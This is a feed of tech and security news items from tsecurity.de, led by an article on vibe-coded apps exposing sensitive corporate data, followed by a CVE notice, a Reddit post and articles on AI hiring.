<guid isPermaLink="true">https://tsecurity.de/de/3501271/it-nachrichten/5000-vibe-coded-apps-just-proved-shadow-ai-is-the-new-s3-bucket-crisis/</guid>
<pubDate>Fri, 08 May 2026 23:08:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most enterprise security programs were built to protect servers, endpoints, and cloud accounts. None of them was built to find a customer intake form that a product manager vibe coded on Lovable over a weekend, connected to a live Supabase database, and deployed on a public URL indexed by Google. That gap now has a price tag.</p><p>New research from Israeli cybersecurity firm <a href="https://redaccess.io/">RedAccess</a> quantifies the scale. The firm discovered 380,000 publicly accessible assets, including applications, databases, and related infrastructure, built with vibe coding tools from Lovable, Base44, and Replit, as well as deployment platform Netlify. Roughly 5,000 of those assets, about 1.3%, contained sensitive corporate information. CEO Dor Zvi said his team found the exposure while researching shadow AI for customers. <a href="https://www.axios.com/2026/05/07/loveable-replit-vibe-coding-privacy">Axios independently verified</a> multiple exposed apps, and <a href="https://www.wired.com/story/thousands-of-vibe-coded-apps-expose-corporate-and-personal-data-on-the-open-web/">Wired confirmed</a> the findings separately.</p><p>Among the verified exposures: a shipping company app detailed which vessels were expected at which ports. An internal health company application listed active clinical trials across the U.K. Full, unredacted customer service conversations for a British cabinet supplier sat on the open web. Internal financial information for a Brazilian bank was accessible to anyone who found the URL.</p><p>The exposed data also included patient conversations at a children’s long-term care facility, hospital doctor-patient summaries, incident response records at a security company, and ad purchasing strategies. Depending on jurisdiction and the data involved, the healthcare and financial exposures may trigger regulatory obligations under HIPAA, UK GDPR, or Brazil’s LGPD. </p><p>RedAccess found phishing sites built on Lovable that impersonated Bank of America, FedEx, Trader Joe’s, and McDonald’s. Lovable said it had begun investigating and removing the phishing sites.</p><h2>The defaults are the problem </h2><p>Privacy settings on several vibe coding platforms make apps publicly accessible unless users manually switch them to private. Many of these applications get indexed by Google and other search engines. Anyone can stumble across them. Zvi put it plainly: “I don’t think it’s feasible to educate the whole world around security. My mother is [vibe coding] with Lovable, and no offense, but I don’t think she will think about role-based access.”</p><h2>This is not an isolated finding </h2><p>In October 2025, Escape.tech <a href="https://escape.tech/blog/methodology-how-we-discovered-vulnerabilities-apps-built-with-vibe-coding/">scanned 5,600 publicly available vibe-coded applications</a> and found more than 2,000 high-impact vulnerabilities, over 400 exposed secrets including API keys and access tokens, and 175 instances of personal data exposure containing medical records and bank account numbers. Every vulnerability Escape found was in a live production system, discoverable within hours. The <a href="https://escape.tech/state-of-security-of-vibe-coded-apps">full report</a> documents the methodology. Escape separately raised <a href="https://www.iris.vc/articles/escape-raises-18m-series-a-to-fight-ai-powered-cyberattacks-with-ai-agents">an $18 million Series A</a> led by Balderton in March 2026, citing the security gap opened by AI-generated code as a core market thesis.</p><p>Gartner’s <a href="https://www.armorcode.com/blog/your-genai-code-debt-is-coming-due-heres-what-gartner-predicts">“Predicts 2026” report</a> forecasts that by 2028, prompt-to-app approaches adopted by citizen developers will increase software defects by 2,500%. Gartner identifies a new class of defect where AI generates code that is syntactically correct but lacks awareness of broader system architecture and nuanced business rules. The remediation costs for these deep contextual bugs will consume budgets previously allocated to innovation.</p><h2>Shadow AI is the multiplier</h2><p><b> </b><a href="https://www.ibm.com/reports/data-breach">IBM’s 2025 Cost of a Data Breach Report</a> found that 20% of organizations experienced breaches linked to shadow AI. Those incidents added $670,000 to the average breach cost, pushing the shadow AI breach average to $4.63 million. Among organizations that reported AI-related breaches, <a href="https://newsroom.ibm.com/2025-07-30-ibm-report-13-of-organizations-reported-breaches-of-ai-models-or-applications,-97-of-which-reported-lacking-proper-ai-access-controls">97% lacked proper access controls</a>. And 63% of breached organizations had no AI governance policy in place. </p><p>Shadow AI breaches disproportionately exposed customer personally identifiable information at 65%, compared to 53% across all breaches, and affected data distributed across multiple environments 62% of the time. Only 34% of organizations with AI governance policies performed regular audits for unsanctioned AI tools. <a href="https://venturebeat.com/security/shadow-ai-doubles-every-18-months-creating-blind-spots-socs-never-see">VentureBeat’s shadow AI research</a> estimated that actively used shadow apps could more than double by mid-2026. Cyberhaven data found 73.8% of ChatGPT workplace accounts in enterprise environments were unauthorized.</p><h2>What to do first</h2><p>The audit framework below gives CISOs a starting point for triaging vibe-coded app risk across five domains.</p><table><tbody><tr><td><p><b>Domain</b></p></td><td><p><b>Current State (Most Orgs)</b></p></td><td><p><b>Target State</b></p></td><td><p><b>First Action</b></p></td></tr><tr><td><p>Discovery</p></td><td><p>No visibility into vibe-coded apps</p></td><td><p>Automated scanning of vibe coding platform domains</p></td><td><p>Run DNS + certificate transparency scan for Lovable, Replit, Base44, and Netlify subdomains tied to corporate assets</p></td></tr><tr><td><p>Authentication</p></td><td><p>Platform defaults (public by default)</p></td><td><p>SSO/SAML integration required before deployment</p></td><td><p>Block unauthenticated apps from accessing internal data sources</p></td></tr><tr><td><p>Code scanning</p></td><td><p>Zero coverage for citizen-built apps</p></td><td><p>Mandatory SAST/DAST before production</p></td><td><p>Extend the existing AppSec pipeline to cover vibe-coded deployments</p></td></tr><tr><td><p>Data loss prevention</p></td><td><p>No DLP coverage for vibe coding domains</p></td><td><p>DLP policies covering Lovable, Replit, Base44, Netlify</p></td><td><p>Add vibe coding platform domains to existing DLP rules</p></td></tr><tr><td><p>Governance</p></td><td><p>No AI usage policy or shadow AI detection</p></td><td><p>AI governance policy with regular audits for unsanctioned tools</p></td><td><p>Publish an acceptable-use policy for AI coding tools with a pre-deployment review gate</p></td></tr></tbody></table><p>The CISO who treats this as a policy problem will write a memo. The CISO who treats this as an architecture problem will deploy discovery scanning across the four largest vibe coding domains, require pre-deployment security review, extend the existing AppSec pipeline to citizen-built apps, and add those domains to DLP rules before the next board meeting. One of those CISOs avoids the next headline.</p><p>The vibe coding exposure RedAccess documented is not a separate problem from shadow AI. It is shadow AI's production layer. Employees build internal tools on platforms that default to public, skip authentication, and never appear on any asset inventory, which means the applications stay invisible to security teams until a breach surfaces or a reporter finds them first. Traditional asset discovery tools were designed to find servers, containers, and cloud instances. They have no way to find a marketing configurator that a product manager built on Lovable over a weekend, connected to a Supabase database holding live customer records, and shared with three external contractors through a public URL that Google indexed within hours.</p><p>The detection challenge runs deeper than most security teams realize. Vibe-coded apps deploy on platform subdomains that rotate frequently and often sit behind CDN layers that mask origin infrastructure. Organizations running mature, secure web gateways, CASB, or DNS logging can detect employee access to these domains. But detecting access is not the same as inventorying what was deployed, what data it holds, or whether it requires authentication. Without explicit monitoring of the major vibe coding platforms, the apps themselves generate a limited signal in conventional SIEM or endpoint telemetry. They exist in a gap between network visibility and application inventory that most security stacks were never architected to cover.</p><h2>The platform responses tell the story </h2><p>Replit CEO Amjad Masad said RedAccess gave his company only 24 hours before going to the press. Base44 (via Wix) and Lovable both said RedAccess did not include the URLs or technical specifics needed to verify the findings. None of the platforms denied that the exposed applications existed.</p><p><a href="https://www.wiz.io/blog/critical-vulnerability-base44">Wiz Research</a> separately discovered in July 2025 that Base44 contained a platform-wide authentication bypass. Exposed API endpoints allowed anyone to create a verified account on private apps using nothing more than a publicly visible app_id. The flaw meant that showing up to a locked building and shouting a room number was enough to get the doors open. Wix fixed the vulnerability within 24 hours after Wiz reported it, but the incident exposed how thin the authentication layer is on platforms where millions of apps are being built by users who assume the platform handles security for them.</p><p>The pattern is consistent across the vibe coding ecosystem. <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-48757">CVE-2025-48757</a> documented insufficient or missing Row-Level Security policies in Lovable-generated Supabase projects. Certain queries skipped access checks entirely, exposing data across more than 170 production applications. The AI generated the database layer. It did not generate the security policies that should have restricted who could read the data. Lovable disputes the CVE classification, stating that individual customers accept responsibility for protecting their application data. That dispute itself illustrates the core tension: platforms that market to nontechnical builders are shifting security responsibility to users who do not know it exists.</p><h2>What this means for security teams </h2><p>The RedAccess findings complete the picture. Professional agents face credential theft on one layer. Citizen platforms face data exposure on the other. The structural failure is the same. Security review happens after deployment or not at all. Identity and access management systems track human users and service accounts. They do not track the Lovable app a sales operations analyst deployed last Tuesday, connected to a live CRM database, and shared with three external contractors via a public URL.</p><p>Nobody asks whether the database policies restrict who can read the data or whether the API endpoints require authentication. When those questions go unasked at AI-generation speed, the exposure scales faster than any human review process can match. The question for security leaders is not whether vibe-coded apps are inside their perimeter. The question is how many, holding what data, visible to whom. The RedAccess findings suggest the answer, for most organizations, is worse than anyone in the C-suite currently knows. The organizations that start scanning this week will find them. The ones that wait will read about themselves next.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-25795 | Autodesk AutoCAD 2022 DWG File buffer overflow (EUVD-2022-30435)]]></title>
<description><![CDATA[A vulnerability was found in Autodesk AutoCAD 2019, AutoCAD 2020, AutoCAD 2021 and AutoCAD 2022 and classified as critical. Affected is an unknown function of the component DWG File Handler. Such manipulation leads to buffer overflow.

This vulnerability is documented as CVE-2022-25795. The attac...]]></description>
<link>https://tsecurity.de/de/3498712/sicherheitsluecken/cve-2022-25795-autodesk-autocad-2022-dwg-file-buffer-overflow-euvd-2022-30435/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498712/sicherheitsluecken/cve-2022-25795-autodesk-autocad-2022-dwg-file-buffer-overflow-euvd-2022-30435/</guid>
<pubDate>Fri, 08 May 2026 11:26:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/autodesk:autocad_2019">Autodesk AutoCAD 2019, AutoCAD 2020, AutoCAD 2021 and AutoCAD 2022</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the component <em>DWG File Handler</em>. Such manipulation leads to buffer overflow.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2022-25795">CVE-2022-25795</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Is there an ACTUAL reason for big Software to not support linux?]]></title>
<description><![CDATA[Like the only reason im still using windows 11 in dual boot is for AutoCAD and MS Office (their online is just something thats really good for group projects and the online version is not good enough for us), but why can Autodesk a company that has MILLIONS of users, schools full of their softwar...]]></description>
<link>https://tsecurity.de/de/3497603/linux-tipps/is-there-an-actual-reason-for-big-software-to-not-support-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497603/linux-tipps/is-there-an-actual-reason-for-big-software-to-not-support-linux/</guid>
<pubDate>Fri, 08 May 2026 02:07:45 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Like the only reason im still using windows 11 in dual boot is for AutoCAD and MS Office (their online is just something thats really good for group projects and the online version is not good enough for us), but why can Autodesk a company that has MILLIONS of users, schools full of their software, my uni MANDATES us to use AutoCAD and its what they teach us, even tho i use FreeCAD for my own projects, i understand MS not supporting linux, but adobe (even tho i dont like them as a company), ect ect not having a linux version or compatability with wine is just wild.</p> <p>EDIT: OK SO I GET IT YALL I FINALLY UNDERSTOOD IT, THANKS FOR ALL THE TECHNICAL REASONS WHY ITS NOT VIABLE.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Opening-Giraffe-1007"> /u/Opening-Giraffe-1007 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1t6p94p/is_there_an_actual_reason_for_big_software_to_not/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1t6p94p/is_there_an_actual_reason_for_big_software_to_not/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft employees learn details of voluntary retirement package: Here’s what the company is offering]]></title>
<description><![CDATA[Microsoft employees eligible for the company's first-ever voluntary retirement program learned the details Thursday, including cash payments of up to nine months of base pay, up to five years of healthcare coverage, and continued stock vesting. Read More]]></description>
<link>https://tsecurity.de/de/3496667/it-nachrichten/microsoft-employees-learn-details-of-voluntary-retirement-package-heres-what-the-company-is-offering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496667/it-nachrichten/microsoft-employees-learn-details-of-voluntary-retirement-package-heres-what-the-company-is-offering/</guid>
<pubDate>Thu, 07 May 2026 17:47:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="877" src="https://cdn.geekwire.com/wp-content/uploads/2026/05/microsoft-cap-1260x877.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/05/microsoft-cap-1260x877.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2026/05/microsoft-cap-768x535.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2026/05/microsoft-cap-1536x1069.jpg 1536w, https://cdn.geekwire.com/wp-content/uploads/2026/05/microsoft-cap.jpg 2023w" sizes="(max-width: 1260px) 100vw, 1260px"><br>Microsoft employees eligible for the company's first-ever voluntary retirement program learned the details Thursday, including cash payments of up to nine months of base pay, up to five years of healthcare coverage, and continued stock vesting. <a href="https://www.geekwire.com/2026/microsoft-employees-learn-details-of-voluntary-retirement-package-heres-what-the-company-is-offering/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI assessment gap: Why your hiring process can’t find the talent you need]]></title>
<description><![CDATA[The next time someone on your team says, ‘hire an AI engineer,’ stop the conversation.



That title is too vague because it fails to account for critical differences in engineering strengths. Instead, companies need to decide specifically what they need. Is it someone to rapidly prototype AI sol...]]></description>
<link>https://tsecurity.de/de/3492257/it-security-nachrichten/the-ai-assessment-gap-why-your-hiring-process-cant-find-the-talent-you-need/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3492257/it-security-nachrichten/the-ai-assessment-gap-why-your-hiring-process-cant-find-the-talent-you-need/</guid>
<pubDate>Wed, 06 May 2026 12:09:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The next time someone on your team says, ‘hire an AI engineer,’ <a href="https://www.cio.com/article/4162080/why-hiring-ai-engineers-wont-work.html">stop the conversation</a>.</p>



<p>That title is too vague because it fails to account for critical differences in engineering strengths. Instead, companies need to decide specifically what they need. Is it someone to rapidly prototype AI solutions? Or someone to build the solution that makes it ready for production? Or someone to design the supporting capabilities and infrastructure to scale it? These are all different skills and require different assessments during the hiring process.</p>



<p>But here’s where companies also fall short. Assessing skills is hard and assessments, as we know them, are broken when it comes to AI. They’re misaligned with what AI roles actually demand. That misalignment is what I call the AI assessment gap.</p>



<h2 class="wp-block-heading">Where the gap lives</h2>



<p>Most technical assessments were built for a pre-AI world: Coding proficiency, algorithms, deterministic system design. These are skills tests. They confirm that an engineer can do the work. But they don’t tell you whether that engineer has the technical taste to make the right decisions when building, scaling or deploying AI systems in production.</p>



<p>In conversations with enterprise engineering leaders, we’re hearing that candidates are now running AI agents during live interviews, getting textbook-perfect answers fed to them in real time. If your assessment can be passed by an AI whispering in someone’s ear, it was never testing for the right thing. Skills can be faked or augmented. Taste can’t.</p>



<p>To see what this looks like, consider this scenario: An enterprise needs someone with deep experience in a specific data platform. A candidate passes the data engineering assessment. They get to the client interview, and the hiring manager says: ‘Tell me about a time you had to make a hard tradeoff in designing a streaming architecture.’ The candidate defines every concept involved. They don’t have the taste to explain why one approach would be dramatically better than another for a specific context. They’re out.</p>



<p>This happens because most assessment pipelines only test for skills: Can they code, understand the fundamentals? Nobody is systematically testing for technical taste: Can this person make better-than-default decisions about architecture, tooling and approach? That question only surfaces once someone with real experience asks it. By then, everyone has wasted time and the role is still open.</p>



<p>Traditional job postings compound the problem by filtering for ‘5+ years of AI experience,’ which screens out strong candidates because the category itself is only a few years old. What matters at the AI layer isn’t tenure. It’s the depth and specificity of what someone has built, deployed or scaled in production. Meanwhile, seniority at the foundational role level still matters in the ways it always has: A senior engineer brings architectural judgment that can’t be shortcut. The mistake is applying years-of-experience filters to the AI layers, where the work hasn’t existed long enough for tenure to be a meaningful signal.</p>



<p>One of the most telling signals of a broken assessment process: When stakeholders simultaneously complain that assessments are too hard and too easy. That’s not a calibration problem. It means the assessments aren’t measuring the right things in the first place. They’re testing for skills when they should be testing for taste.</p>



<h2 class="wp-block-heading"><a></a>Start with the work, not the title</h2>



<p>To close the AI assessment gap, decompose the problem before you assess and decompose the need across the dimensions that actually determine whether someone can do the job. For example:</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Dimension</strong></td><td><strong>The Question</strong></td><td><strong>What It Determines</strong></td><td><strong>How You Evaluate</strong></td></tr></thead><tbody><tr><td><strong>Role</strong></td><td>What technical domain does the work live in?</td><td>Foundational skills and stack (e.g., backend engineer, Python, PostgreSQL)</td><td>Skills assessment: Project-based or simulation-based filter that confirms core engineering competency</td></tr><tr><td><strong>Seniority</strong></td><td>What level of judgment and autonomy does this work require?</td><td>Engineering maturity, depth of technical taste, ability to operate under ambiguity</td><td>Experience depth at the role level: Years of practice in the domain, complexity of systems designed and shipped</td></tr><tr><td><strong>AI Engagement Pattern</strong></td><td>How will this person engage with AI systems?</td><td>The specific technical taste required (e.g., Prototyper needs taste for sensing value; Builder needs taste for architecture and integration decisions; Scaler needs taste for performance, <a href="https://www.cio.com/article/4043166/how-ai-will-forge-the-next-generation-of-cybersecurity-talent.html">governance and risk tradeoffs</a>)</td><td>Applied assessments: Not ‘define RAG’ but ‘given this use case, which approach would you choose and why?’ Testing for tradeoff reasoning, not terminology</td></tr></tbody></table> </div></figure>



<p>This decomposition replaces the single job description with a structured picture of what you actually need. It also immediately reveals whether you’re looking for one person or a team. If the project requires rapid prototyping to find value and then a production build, you probably need engineers with different profiles–not one ‘AI engineer’ who’s supposed to do both.</p>



<h2 class="wp-block-heading">Three things most enterprises get wrong</h2>



<ol start="1" class="wp-block-list">
<li><strong>They test for skills when they should test for taste.</strong> Most assessments confirm that an engineer can write code and define concepts. They don’t test whether that engineer can make the architectural and tooling decisions that actually determine project success. An engineer who knows what agentic search is and an engineer who knows when agentic search is the right choice for a specific problem are two completely different hires. The first passes your skills test. The second delivers in production.</li>
</ol>



<ol start="2" class="wp-block-list">
<li><strong>They conflate skills with experience.</strong> A skills assessment tells you if someone can do the work. An experience validation tells you if someone has done the work in the specific context the job demands. These require completely different evaluation methods. When companies try to test both with a single instrument, they get the ‘too hard and too easy’ paradox: The assessment is simultaneously screening out competent people and letting through candidates who can’t perform. Seniority and years of experience are meaningful at the role level, where 10 years of backend engineering builds real architectural judgment and compounds technical taste. They’re much less meaningful at the AI engagement layer, where the work itself is only a few years old and depth of hands-on exposure matters more than calendar time.</li>
</ol>



<ol start="3" class="wp-block-list">
<li><strong>They treat assessment as a snapshot.</strong> The traditional model is a one-time gate: Pass or fail, in or out. In an AI world where skills are evolving monthly, that approach breaks down fast. Six months ago, almost nobody was shipping production code with agentic tools like <a href="https://code.claude.com/docs/en/overview">Claude Code</a>. <a href="https://www.anthropic.com/news/model-context-protocol" rel="nofollow">Model Context Protocol</a>, which lets AI systems plug into enterprise tools and data sources, was barely on anyone’s radar. Now enterprises are hiring for these skills specifically. Six months from now, the list will change again.</li>
</ol>



<p>That means an assessment built in January is already partially stale by June. Companies that treat assessment as a living system, continuously updated by performance signals from real engagements, will consistently field better talent than those running the same tests they built a year ago.</p>



<h2 class="wp-block-heading">The reskilling imperative</h2>



<p>The reality is, there is no way to close this gap through hiring alone. The supply of engineers who already have the technical taste for AI work is a tiny fraction of what the market demands.  For example, since the launch of ChatGPT in 2022, demand for roles that require more analytical, technical or creative work has <a href="https://www.library.hbs.edu/working-knowledge/enhance-or-eliminate-how-ai-will-likely-change-these-jobs">increased by 20%</a>.</p>



<p>Which means enterprises have to reskill and upskill existing workforces. And without a targeted approach mapped to actual needs, <a href="https://www.cio.com/article/4117091/how-ai-upskilling-fails-and-what-it-leaders-are-doing-to-get-it-right.html">AI upskilling efforts often fail</a>, leaving employees unsupported and initiatives stalled.</p>



<p>This is where the multi-dimensional model pays off beyond hiring. The same framework that powers your talent acquisition also powers your training strategy. Assessment results don’t just filter candidates in or out. They generate a heat map of where your workforce is strong and where it’s thin, across every dimension: Role competency, seniority depth and the specific technical taste required for prototyping, building or scaling AI systems. That heat map becomes your training roadmap.</p>



<p>Most companies skip this entirely and jump straight to ‘let’s buy an AI training program.’ Without that foundation, even the best training program is solving the wrong problem.</p>



<h2 class="wp-block-heading">Ever ready</h2>



<p>In the world of AI, the most critical skill might be knowing that you don’t and can’t possibly know everything. Or even what’s coming next. The roles we need today will look different in six months. The skills taxonomies we build now will need constant revision. The assessments we deploy this quarter will need recalibration by next quarter.</p>



<p>Companies that accept this reality and build nimble, multi-dimensional approaches to talent assessment will find something valuable: The technical taste they need already exists in their workforce, hiding behind outdated job descriptions and misaligned tests. CIOs must <a href="https://www.cio.com/article/4132224/ai-is-redefining-entry-level-tech-roles-heres-what-cios-need-to-change-now.html">actively audit these descriptions</a> to eliminate the traditional experience filters that mask the latent talent already sitting on their teams.  The others will keep posting for ‘AI engineers’ and wondering why nobody who gets hired can actually do the job.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[We Scanned 1 Million Exposed AI Services. Here’s How Bad the Security Actually Is]]></title>
<description><![CDATA[While the software industry has made genuine strides over the past few decades to deliver products securely, the furious pace of AI adoption is putting that progress at risk. Businesses are moving fast to self-host LLM infrastructure, drawn by the…
Read more →
The post We Scanned 1 Million Expose...]]></description>
<link>https://tsecurity.de/de/3489365/it-security-nachrichten/we-scanned-1-million-exposed-ai-services-heres-how-bad-the-security-actually-is/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3489365/it-security-nachrichten/we-scanned-1-million-exposed-ai-services-heres-how-bad-the-security-actually-is/</guid>
<pubDate>Tue, 05 May 2026 13:37:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>While the software industry has made genuine strides over the past few decades to deliver products securely, the furious pace of AI adoption is putting that progress at risk. Businesses are moving fast to self-host LLM infrastructure, drawn by the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/we-scanned-1-million-exposed-ai-services-heres-how-bad-the-security-actually-is/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/we-scanned-1-million-exposed-ai-services-heres-how-bad-the-security-actually-is/">We Scanned 1 Million Exposed AI Services. Here’s How Bad the Security Actually Is</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft’s bad obsession is showing up in shabby services and slipshod software. Here’s proof]]></title>
<description><![CDATA[If you can’t bother to keep GitHub running, why should we bother with you? Opinion  It’s been another shabby week for Microsoft, and a shabbier one for its users. We learnt that Windows 11’s epic habit of trying to corral…
Read more →
The post Microsoft’s bad obsession is showing up in shabby ser...]]></description>
<link>https://tsecurity.de/de/3488942/it-security-nachrichten/microsofts-bad-obsession-is-showing-up-in-shabby-services-and-slipshod-software-heres-proof/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3488942/it-security-nachrichten/microsofts-bad-obsession-is-showing-up-in-shabby-services-and-slipshod-software-heres-proof/</guid>
<pubDate>Tue, 05 May 2026 11:22:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you can’t bother to keep GitHub running, why should we bother with you? Opinion  It’s been another shabby week for Microsoft, and a shabbier one for its users. We learnt that Windows 11’s epic habit of trying to corral…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/microsofts-bad-obsession-is-showing-up-in-shabby-services-and-slipshod-software-heres-proof/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/microsofts-bad-obsession-is-showing-up-in-shabby-services-and-slipshod-software-heres-proof/">Microsoft’s bad obsession is showing up in shabby services and slipshod software. Here’s proof</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI won’t fix tech talent gaps — but YOU can]]></title>
<description><![CDATA[Every CIO I talk to — and I talk to a lot of them — agrees that skills-first hiring makes sense. And with AI now embedded in nearly every stage of the hiring process, from resume screening to candidate matching, many assume the technology will finally make it happen at scale.



It won’t. AI can ...]]></description>
<link>https://tsecurity.de/de/3485510/it-security-nachrichten/ai-wont-fix-tech-talent-gaps-but-you-can/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3485510/it-security-nachrichten/ai-wont-fix-tech-talent-gaps-but-you-can/</guid>
<pubDate>Mon, 04 May 2026 11:05:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Every CIO I talk to — and I talk to a lot of them — agrees that skills-first hiring makes sense. And with AI now embedded in nearly every stage of the hiring process, from resume screening to candidate matching, many assume the technology will finally make it happen at scale.</p>



<p>It won’t. AI can accelerate hiring decisions, but it can’t fix the underlying systems that power those decisions.</p>



<p>Despite initial progress in removing college degree requirements from job postings, many organizations are still getting it wrong — and AI is giving them new ways to get it wrong faster. Agreeing on a principle isn’t the same as operationalizing one. Even when there’s a skills-first hiring strategy in place, execution fails if IT, HR and business leaders aren’t aligned on outcomes, accountability and measurement. When AI screening tools are layered on top of misaligned systems, the result isn’t smarter hiring; it’s automated bias with a veneer of objectivity.</p>



<h2 class="wp-block-heading">Why skills-first hiring became a buzzword<strong></strong></h2>



<p>The idea of prioritizing skills in hiring decisions isn’t new. <a href="https://workitect.com/test-competence-or-intelligence/" rel="nofollow">Competency-based hiring has been discussed in talent management circles since the 1970s.</a> Over the last two decades, the growing technology skills gap, the explosion of non-traditional learning pathways and the broader recognition of “degree inflation” pushed skills-based hiring into the mainstream. Large employers publicly dropped degree requirements. States followed. Everyone was buzzing about skills-first hiring.</p>



<p>But buzz doesn’t change systems.<a href="https://www.hiringlab.org/2024/02/27/educational-requirements-job-postings/" rel="nofollow"> Data from Indeed showed a decrease in job postings with college degree requirements between 2019 to 2024</a>, but <a href="https://www.hiringlab.org/2026/01/28/where-do-college-degrees-still-matter-in-a-skills-first-job-market/" rel="nofollow">by November 2025, the number swung back up</a>, nearly erasing the gains of the previous five years. </p>



<p>Meanwhile, the skills that matter most now — prompt engineering, AI tool fluency, the ability to scope and complete AI-augmented projects — are being developed outside traditional degree programs. That makes degrees an even worse proxy for career readiness.</p>



<p>Announcing that an organization is “skills-first” without redesigning the infrastructure that surrounds hiring — job descriptions, applicant screening, recruiter training, interview rubrics and onboarding frameworks — doesn’t change practices. A <a href="https://www.phoenix.edu/career-institute/illusion-of-progress-in-skills-based-hiring.html#key-findings" rel="nofollow">recent survey by the University of Phoenix</a> found that 69% of hiring decision makers believe there’s still too much focus on college degrees, with little clarity on what they should evaluate instead.</p>



<h2 class="wp-block-heading">The 3 most common failure points<strong></strong></h2>



<p>From my experience in working with CIOs on their entry-level talent pipelines, skills-first initiatives tend to break down in one or more of these places: job descriptions, screening tools and internal skepticism.</p>



<p>First, take job descriptions. Hiring managers tend to default to historical templates — pasting in degree requirements and years-of-experience thresholds that were never validated against actual job performance and are even less relevant with AI in the mix.</p>



<p>Second, screening tools. <a href="https://www.weforum.org/stories/2025/03/ai-hiring-human-touch-recruitment/" rel="nofollow">Nearly 90 percent of companies are using some form of AI to screen candidates</a>, expecting greater efficiency and less bias. But AI screening tools learn from existing hiring data — which, if biased, just means that bias is now automated. Patterns in successful candidates’ backgrounds get baked into future decisions, <a href="https://mitsloan.mit.edu/ideas-made-to-matter/ai-reinventing-hiring-same-old-biases-heres-how-to-avoid-trap" rel="nofollow">except now, these decisions appear “data-driven” and neutral instead of more obviously predicated on certain hiring managers’ preference for college graduates</a>.</p>



<p>The third failure point is internal skepticism — and the training gap that feeds it. According to the survey by the University of Phoenix, one in four non-HR managers receives no training before interviewing job candidates, even when the final hiring decision is theirs. Without shared definitions of what “skills-first” means and clear accountability, the initiative collapses under the weight of individual discretion.</p>



<h2 class="wp-block-heading">What CIOs see that others miss<strong></strong></h2>



<p>CIOs are often closer to the consequences of a bad hire than anyone else in the C-suite. When a cybersecurity analyst freezes during an incident response, the CIO gets a front-row view of the damage a skills gap can cause.</p>



<p>CIOs are also watching AI redefine what “qualified” looks like in real time. The engineer who deploys an agentic AI system to automate monitoring, or the analyst who chains multiple AI tools into a custom workflow — these people deliver outsized value, and their qualifications often look nothing like what a traditional job description demands.</p>



<p>And CIOs have a keen understanding of issues with tech talent pipelines. Projects slip while niche technical roles sit open for six months or more, even as candidates from rigorous programs — people with the specific skills for the job — are filtered out.</p>



<h2 class="wp-block-heading">How successful CIOs operationalize skills-first hiring</h2>



<p>Successful CIOs get specific. They work with their teams to define exactly which skills matter for each role — and they validate those definitions against the performance of current, thriving employees.</p>



<p>Should that taxonomy include demonstrated experience with AI tools and platforms: Has the candidate built or deployed an AI agent? Can they work across multiple AI tools? Have they completed projects requiring AI-augmented problem-solving? These concrete, observable skills predict performance far more than a degree ever could.</p>



